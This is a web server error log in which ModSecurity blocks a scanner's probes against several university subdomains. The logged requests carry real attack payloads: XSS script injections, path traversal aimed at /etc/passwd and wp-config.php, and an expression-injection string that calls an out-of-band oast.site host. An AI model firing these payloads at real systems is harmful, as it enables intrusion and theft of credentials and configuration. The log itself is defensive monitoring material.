[Tue Aug 29 11:38:33.372873 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXm8AAAAAAW"]
[Tue Aug 29 11:38:33.379859 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAX0Km0AAAAl"]
[Tue Aug 29 11:38:33.380653 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAARiDxUAAAAJ"]
[Tue Aug 29 11:38:33.394535 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXVyrUAAAAB"]
[Tue Aug 29 11:38:34.433709 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26g19i8d46w56q8n.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAYIYhMAAAAM"]
[Tue Aug 29 11:38:34.476531 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAXVyrcAAAAB"]
[Tue Aug 29 11:38:34.480110 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26ggpcdwdnrzm3qh.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAXm8AMAAAAW"]
[Tue Aug 29 11:38:34.480651 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX0Km8AAAAl"]
[Tue Aug 29 11:38:34.525556 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX0KnEAAAAl"]
[Tue Aug 29 11:38:34.528622 2023] [:error] [pid 1528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX4pmAAAAAF"]
[Tue Aug 29 11:38:34.529694 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAV1EbQAAAAd"]
[Tue Aug 29 11:38:34.530587 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12SsCo-f0AAARiDxkAAAAJ"]
[Tue Aug 29 11:38:35.363795 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAARiDxoAAAAJ"]
[Tue Aug 29 11:38:35.365338 2023] [:error] [pid 1547] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYLYbUAAAAQ"]
[Tue Aug 29 11:38:35.365347 2023] [:error] [pid 1528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAX4pmEAAAAF"]
[Tue Aug 29 11:38:35.368963 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAXm8AYAAAAW"]
[Tue Aug 29 11:38:35.397107 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAYIYhgAAAAM"]
[Tue Aug 29 11:38:44.425040 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12VMCo-f0AAAYIYi4AAAAM"]
[Tue Aug 29 11:38:45.365900 2023] [:error] [pid 1565] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12VcCo-f0AAAYdUekAAAAQ"]
[Tue Aug 29 11:38:46.367807 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXYiMIAAAAG"]
[Tue Aug 29 11:38:46.372909 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYKOSsAAAAP"]
[Tue Aug 29 11:38:46.379577 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXm8CgAAAAW"]
[Tue Aug 29 11:38:46.385162 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAXxYRIAAAAh"]
[Tue Aug 29 11:38:46.409928 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12VsCo-f0AAAXYiMQAAAAG"]
[Tue Aug 29 11:38:46.419161 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYIYjIAAAAM"]
[Tue Aug 29 11:38:47.358819 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXm8CsAAAAW"]
[Tue Aug 29 11:38:47.363516 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXJ6g0AAAAX"]
[Tue Aug 29 11:38:47.365212 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYb5sAAAAAI"]
[Tue Aug 29 11:38:47.395102 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYelUUAAAAV"]
[Tue Aug 29 11:38:47.395452 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAXbb8AAAAAL"]
[Tue Aug 29 11:38:47.397113 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAUFduoAAAA9"]
[Tue Aug 29 11:38:47.402426 2023] [:error] [pid 1546] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYKOS4AAAAP"]
[Tue Aug 29 11:38:47.407995 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYIYjUAAAAM"]
[Tue Aug 29 11:38:47.415114 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYculoAAAAN"]
[Tue Aug 29 11:38:47.415806 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYelUYAAAAV"]
